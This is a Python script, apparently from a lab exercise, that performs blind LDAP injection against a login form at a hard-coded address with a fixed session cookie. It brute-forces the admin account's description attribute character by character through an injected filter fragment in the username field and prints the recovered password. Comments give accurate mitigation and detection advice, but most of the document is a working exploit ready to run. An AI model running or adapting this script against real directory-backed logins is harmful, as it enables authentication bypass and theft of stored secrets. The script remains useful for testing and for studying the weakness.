LDAP Data exfil
LDAP - LDAP injection - Authentication bypass - Brute force
import requests
import string
# Lab demonstration of blind LDAP injection against a login form.
#
# What the script relies on (useful when reviewing an application for the
# same weakness):
#   * The value of the "username" form field changes the structure of the
#     directory query. Presumably the server concatenates it into an LDAP
#     search filter without escaping; confirm against the application code.
#   * The login response differs between "filter matched" and "filter did not
#     match" (the text in success_msg), which leaks one bit per request.
#
# Mitigation: escape every user-supplied value before it is placed in a search
# filter (RFC 4515 escaping; in PHP, ldap_escape() with LDAP_ESCAPE_FILTER),
# keep secrets out of readable attributes such as description, and restrict
# which attributes the application's bind account may read.
# Detection: a burst of login POSTs for a single account whose username field
# contains filter metacharacters such as ")(", "|" or "*".

url = "http://94.237.50.242:31867"
headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "Cookie": "PHPSESSID=b2feampt7epd0bfb0lqmtl7i9h"
}

# Text the application returns when the injected filter matched an entry.
success_msg = "Login successful"

# Candidate characters, tried in this order at every position.
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$%^&*()-_=+[]{}|;:'\",.<>?/\\`~"

password = ""
max_length = 50


def _prefix_accepted(password, char):
    """Send one login attempt and report whether the response signals a match.

    The username field carries a filter fragment that tests whether the
    description attribute starts with ``password + char``.
    """
    payload = f")(|(description={password}{char}*"
    # Post request
    data = f"username=admin{payload}&password=invalid)"
    x = requests.post(url, data, headers=headers)
    # Check for success message
    return success_msg in x.text


for _ in range(max_length):
    # The generator is lazy, so requests stop at the first accepted character.
    char = next((c for c in alphabet if _prefix_accepted(password, c)), None)
    if char is None:
        # No match means complete
        break
    password += char
    print(f"Current password: {password}")

print(f"Password: {password}")